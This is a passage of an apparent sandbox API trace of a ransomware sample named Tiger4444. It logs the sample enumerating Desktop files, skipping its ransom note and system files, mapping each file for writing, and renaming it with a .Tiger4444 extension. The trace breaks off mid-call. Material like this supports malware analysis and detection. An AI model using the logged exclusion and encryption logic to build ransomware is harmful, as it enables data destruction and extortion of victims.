[0049.585] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.585] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14103798747) returned 1 [0049.585] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=9078) returned 1 [0049.585] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0049.585] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0049.585] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2680, lpName=0x0) returned 0x2c8 [0049.585] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2680) returned 0xbe0000 [0049.586] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.586] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0049.586] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.586] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0049.586] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.586] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0049.586] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.586] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0049.586] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14103906714) returned 1 [0049.586] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0049.586] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0049.586] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.586] CloseHandle (hObject=0x2c8) returned 1 [0049.586] CloseHandle (hObject=0x260) returned 1 [0049.587] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\TMtiGZYo.mp4.Tiger4444") returned 46 [0049.587] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\TMtiGZYo.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\tmtigzyo.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\TMtiGZYo.mp4.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\tmtigzyo.mp4.tiger4444"), dwFlags=0x1) returned 1 [0049.587] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd5b760, ftCreationTime.dwHighDateTime=0x1d4c754, ftLastAccessTime.dwLowDateTime=0x1f097db0, ftLastAccessTime.dwHighDateTime=0x1d4caa4, ftLastWriteTime.dwLowDateTime=0x1f097db0, ftLastWriteTime.dwHighDateTime=0x1d4caa4, nFileSizeHigh=0x0, nFileSizeLow=0x14084, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TTdnqfy.mp3", cAlternateFileName="")) returned 1 [0049.587] lstrcmpiW (lpString1="TTdnqfy.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.587] lstrcmpiW (lpString1="TTdnqfy.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.587] lstrcmpiW (lpString1="TTdnqfy.mp3", lpString2="Tiger4444.exe") returned 1 [0049.587] lstrcmpiW (lpString1="TTdnqfy.mp3", lpString2=".") returned 1 [0049.587] lstrcmpiW (lpString1="TTdnqfy.mp3", lpString2="..") returned 1 [0049.587] lstrcmpiW (lpString1="TTdnqfy.mp3", lpString2="windows") returned -1 [0049.587] lstrcmpiW (lpString1="TTdnqfy.mp3", lpString2="bootmgr") returned 1 [0049.587] lstrcmpiW (lpString1="TTdnqfy.mp3", lpString2="pagefile.sys") returned 1 [0049.587] lstrcmpiW (lpString1="TTdnqfy.mp3", lpString2="boot") returned 1 [0049.587] lstrcmpiW (lpString1="TTdnqfy.mp3", lpString2="ids.txt") returned 1 [0049.587] lstrcmpiW (lpString1="TTdnqfy.mp3", lpString2="NTUSER.DAT") returned 1 [0049.587] lstrcpyW (in: lpString1=0x30aead8, lpString2="TTdnqfy.mp3" | out: lpString1="TTdnqfy.mp3") returned="TTdnqfy.mp3" [0049.587] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\TTdnqfy.mp3", dwFileAttributes=0x0) returned 1 [0049.588] lstrlenW (lpString="TTdnqfy.mp3") returned 11 [0049.588] lstrlenW (lpString="Tiger4444") returned 9 [0049.588] lstrcmpiW (lpString1="dnqfy.mp3", lpString2="Tiger4444") returned -1 [0049.588] lstrlenW (lpString=".dll") returned 4 [0049.588] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0049.588] lstrlenW (lpString=".lnk") returned 4 [0049.588] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0049.588] lstrlenW (lpString=".ini") returned 4 [0049.588] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0049.588] lstrlenW (lpString=".sys") returned 4 [0049.588] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0049.588] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\TTdnqfy.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\ttdnqfy.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.588] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.588] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14104111287) returned 1 [0049.588] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=82052) returned 1 [0049.588] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0049.588] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d08 [0049.588] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14390, lpName=0x0) returned 0x2c8 [0049.588] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14390) returned 0xbe0000 [0049.590] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.590] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0049.590] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.590] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0049.590] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.590] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0049.590] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.590] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0049.590] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14104355846) returned 1 [0049.591] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0049.591] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d08 | out: hHeap=0xc50000) returned 1 [0049.591] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.591] CloseHandle (hObject=0x2c8) returned 1 [0049.591] CloseHandle (hObject=0x260) returned 1 [0049.592] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\TTdnqfy.mp3.Tiger4444") returned 45 [0049.592] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\TTdnqfy.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\ttdnqfy.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\TTdnqfy.mp3.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\ttdnqfy.mp3.tiger4444"), dwFlags=0x1) returned 1 [0049.592] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e482d90, ftCreationTime.dwHighDateTime=0x1d4c743, ftLastAccessTime.dwLowDateTime=0x91034d60, ftLastAccessTime.dwHighDateTime=0x1d4c5cc, ftLastWriteTime.dwLowDateTime=0x91034d60, ftLastWriteTime.dwHighDateTime=0x1d4c5cc, nFileSizeHigh=0x0, nFileSizeLow=0xfd47, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uKeH6EOh0T.avi", cAlternateFileName="UKEH6E~1.AVI")) returned 1 [0049.592] lstrcmpiW (lpString1="uKeH6EOh0T.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.592] lstrcmpiW (lpString1="uKeH6EOh0T.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.592] lstrcmpiW (lpString1="uKeH6EOh0T.avi", lpString2="Tiger4444.exe") returned 1 [0049.592] lstrcmpiW (lpString1="uKeH6EOh0T.avi", lpString2=".") returned 1 [0049.592] lstrcmpiW (lpString1="uKeH6EOh0T.avi", lpString2="..") returned 1 [0049.592] lstrcmpiW (lpString1="uKeH6EOh0T.avi", lpString2="windows") returned -1 [0049.592] lstrcmpiW (lpString1="uKeH6EOh0T.avi", lpString2="bootmgr") returned 1 [0049.592] lstrcmpiW (lpString1="uKeH6EOh0T.avi", lpString2="pagefile.sys") returned 1 [0049.592] lstrcmpiW (lpString1="uKeH6EOh0T.avi", lpString2="boot") returned 1 [0049.592] lstrcmpiW (lpString1="uKeH6EOh0T.avi", lpString2="ids.txt") returned 1 [0049.592] lstrcmpiW (lpString1="uKeH6EOh0T.avi", lpString2="NTUSER.DAT") returned 1 [0049.593] lstrcpyW (in: lpString1=0x30aead8, lpString2="uKeH6EOh0T.avi" | out: lpString1="uKeH6EOh0T.avi") returned="uKeH6EOh0T.avi" [0049.593] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uKeH6EOh0T.avi", dwFileAttributes=0x0) returned 1 [0049.593] lstrlenW (lpString="uKeH6EOh0T.avi") returned 14 [0049.593] lstrlenW (lpString="Tiger4444") returned 9 [0049.593] lstrcmpiW (lpString1="EOh0T.avi", lpString2="Tiger4444") returned -1 [0049.593] lstrlenW (lpString=".dll") returned 4 [0049.593] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0049.593] lstrlenW (lpString=".lnk") returned 4 [0049.593] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0049.593] lstrlenW (lpString=".ini") returned 4 [0049.593] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0049.593] lstrlenW (lpString=".sys") returned 4 [0049.593] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0049.593] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uKeH6EOh0T.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\ukeh6eoh0t.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.593] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.593] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14104621815) returned 1 [0049.593] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=64839) returned 1 [0049.593] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0049.593] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0049.593] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10050, lpName=0x0) returned 0x2c8 [0049.593] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10050) returned 0xbe0000 [0049.595] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.595] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0049.595] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.595] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0049.595] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.595] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0049.595] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.595] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0049.595] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14104846960) returned 1 [0049.595] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0049.595] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0049.595] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.596] CloseHandle (hObject=0x2c8) returned 1 [0049.596] CloseHandle (hObject=0x260) returned 1 [0049.597] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\uKeH6EOh0T.avi.Tiger4444") returned 48 [0049.597] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\uKeH6EOh0T.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\ukeh6eoh0t.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\uKeH6EOh0T.avi.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\ukeh6eoh0t.avi.tiger4444"), dwFlags=0x1) returned 1 [0049.597] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e6611e0, ftCreationTime.dwHighDateTime=0x1d4ce4c, ftLastAccessTime.dwLowDateTime=0x16c2a790, ftLastAccessTime.dwHighDateTime=0x1d4c661, ftLastWriteTime.dwLowDateTime=0x16c2a790, ftLastWriteTime.dwHighDateTime=0x1d4c661, nFileSizeHigh=0x0, nFileSizeLow=0x117d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ut _Q2wK.csv", cAlternateFileName="UT_Q2W~1.CSV")) returned 1 [0049.597] lstrcmpiW (lpString1="ut _Q2wK.csv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.597] lstrcmpiW (lpString1="ut _Q2wK.csv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.597] lstrcmpiW (lpString1="ut _Q2wK.csv", lpString2="Tiger4444.exe") returned 1 [0049.597] lstrcmpiW (lpString1="ut _Q2wK.csv", lpString2=".") returned 1 [0049.597] lstrcmpiW (lpString1="ut _Q2wK.csv", lpString2="..") returned 1 [0049.597] lstrcmpiW (lpString1="ut _Q2wK.csv", lpString2="windows") returned -1 [0049.597] lstrcmpiW (lpString1="ut _Q2wK.csv", lpString2="bootmgr") returned 1 [0049.597] lstrcmpiW (lpString1="ut _Q2wK.csv", lpString2="pagefile.sys") returned 1 [0049.597] lstrcmpiW (lpString1="ut _Q2wK.csv", lpString2="boot") returned 1 [0049.597] lstrcmpiW (lpString1="ut _Q2wK.csv", lpString2="ids.txt") returned 1 [0049.597] lstrcmpiW (lpString1="ut _Q2wK.csv", lpString2="NTUSER.DAT") returned 1 [0049.597] lstrcpyW (in: lpString1=0x30aead8, lpString2="ut _Q2wK.csv" | out: lpString1="ut _Q2wK.csv") returned="ut _Q2wK.csv" [0049.597] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ut _Q2wK.csv", dwFileAttributes=0x0) returned 1 [0049.597] lstrlenW (lpString="ut _Q2wK.csv") returned 12 [0049.597] lstrlenW (lpString="Tiger4444") returned 9 [0049.597] lstrcmpiW (lpString1="_Q2wK.csv", lpString2="Tiger4444") returned -1 [0049.597] lstrlenW (lpString=".dll") returned 4 [0049.597] lstrcmpiW (lpString1=".csv", lpString2=".dll") returned -1 [0049.598] lstrlenW (lpString=".lnk") returned 4 [0049.598] lstrcmpiW (lpString1=".csv", lpString2=".lnk") returned -1 [0049.598] lstrlenW (lpString=".ini") returned 4 [0049.598] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0049.598] lstrlenW (lpString=".sys") returned 4 [0049.598] lstrcmpiW (lpString1=".csv", lpString2=".sys") returned -1 [0049.598] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ut _Q2wK.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\ut _q2wk.csv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.598] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.598] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14105090026) returned 1 [0049.598] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=71640) returned 1 [0049.598] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0049.598] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0049.598] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11ae0, lpName=0x0) returned 0x2c8 [0049.598] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11ae0) returned 0xbe0000 [0049.599] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.599] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0049.599] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.599] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0049.600] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.600] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0049.600] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.600] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0049.600] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14105293553) returned 1 [0049.600] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0049.600] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0049.600] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.601] CloseHandle (hObject=0x2c8) returned 1 [0049.601] CloseHandle (hObject=0x260) returned 1 [0049.606] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\ut _Q2wK.csv.Tiger4444") returned 46 [0049.606] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\ut _Q2wK.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\ut _q2wk.csv"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\ut _Q2wK.csv.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\ut _q2wk.csv.tiger4444"), dwFlags=0x1) returned 1 [0049.606] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30ca9bf0, ftCreationTime.dwHighDateTime=0x1d4cb4a, ftLastAccessTime.dwLowDateTime=0xfa8d7510, ftLastAccessTime.dwHighDateTime=0x1d4d0f0, ftLastWriteTime.dwLowDateTime=0xfa8d7510, ftLastWriteTime.dwHighDateTime=0x1d4d0f0, nFileSizeHigh=0x0, nFileSizeLow=0x11456, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VrmBeAnjedws.gif", cAlternateFileName="VRMBEA~1.GIF")) returned 1 [0049.606] lstrcmpiW (lpString1="VrmBeAnjedws.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.606] lstrcmpiW (lpString1="VrmBeAnjedws.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.606] lstrcmpiW (lpString1="VrmBeAnjedws.gif", lpString2="Tiger4444.exe") returned 1 [0049.606] lstrcmpiW (lpString1="VrmBeAnjedws.gif", lpString2=".") returned 1 [0049.606] lstrcmpiW (lpString1="VrmBeAnjedws.gif", lpString2="..") returned 1 [0049.606] lstrcmpiW (lpString1="VrmBeAnjedws.gif", lpString2="windows") returned -1 [0049.606] lstrcmpiW (lpString1="VrmBeAnjedws.gif", lpString2="bootmgr") returned 1 [0049.606] lstrcmpiW (lpString1="VrmBeAnjedws.gif", lpString2="pagefile.sys") returned 1 [0049.606] lstrcmpiW (lpString1="VrmBeAnjedws.gif", lpString2="boot") returned 1 [0049.606] lstrcmpiW (lpString1="VrmBeAnjedws.gif", lpString2="ids.txt") returned 1 [0049.606] lstrcmpiW (lpString1="VrmBeAnjedws.gif", lpString2="NTUSER.DAT") returned 1 [0049.606] lstrcpyW (in: lpString1=0x30aead8, lpString2="VrmBeAnjedws.gif" | out: lpString1="VrmBeAnjedws.gif") returned="VrmBeAnjedws.gif" [0049.606] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\VrmBeAnjedws.gif", dwFileAttributes=0x0) returned 1 [0049.606] lstrlenW (lpString="VrmBeAnjedws.gif") returned 16 [0049.607] lstrlenW (lpString="Tiger4444") returned 9 [0049.607] lstrcmpiW (lpString1="jedws.gif", lpString2="Tiger4444") returned -1 [0049.607] lstrlenW (lpString=".dll") returned 4 [0049.607] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0049.607] lstrlenW (lpString=".lnk") returned 4 [0049.607] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0049.607] lstrlenW (lpString=".ini") returned 4 [0049.607] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0049.607] lstrlenW (lpString=".sys") returned 4 [0049.607] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0049.607] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\VrmBeAnjedws.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\vrmbeanjedws.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.607] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.607] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14106009462) returned 1 [0049.607] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=70742) returned 1 [0049.607] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ba8 [0049.607] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72258 [0049.607] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11760, lpName=0x0) returned 0x2c8 [0049.607] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11760) returned 0xbe0000 [0049.609] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.609] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0049.609] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.609] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0049.609] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.609] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0049.609] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.609] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0049.609] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14106218118) returned 1 [0049.609] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0049.609] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72258 | out: hHeap=0xc50000) returned 1 [0049.609] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.610] CloseHandle (hObject=0x2c8) returned 1 [0049.610] CloseHandle (hObject=0x260) returned 1 [0049.610] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\VrmBeAnjedws.gif.Tiger4444") returned 50 [0049.610] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\VrmBeAnjedws.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\vrmbeanjedws.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\VrmBeAnjedws.gif.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\vrmbeanjedws.gif.tiger4444"), dwFlags=0x1) returned 1 [0049.611] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3daca50, ftCreationTime.dwHighDateTime=0x1d4cc28, ftLastAccessTime.dwLowDateTime=0x942d3090, ftLastAccessTime.dwHighDateTime=0x1d4cd34, ftLastWriteTime.dwLowDateTime=0x942d3090, ftLastWriteTime.dwHighDateTime=0x1d4cd34, nFileSizeHigh=0x0, nFileSizeLow=0x15dbf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wa4HKe.mp3", cAlternateFileName="")) returned 1 [0049.611] lstrcmpiW (lpString1="Wa4HKe.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.611] lstrcmpiW (lpString1="Wa4HKe.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.611] lstrcmpiW (lpString1="Wa4HKe.mp3", lpString2="Tiger4444.exe") returned 1 [0049.611] lstrcmpiW (lpString1="Wa4HKe.mp3", lpString2=".") returned 1 [0049.611] lstrcmpiW (lpString1="Wa4HKe.mp3", lpString2="..") returned 1 [0049.611] lstrcmpiW (lpString1="Wa4HKe.mp3", lpString2="windows") returned -1 [0049.611] 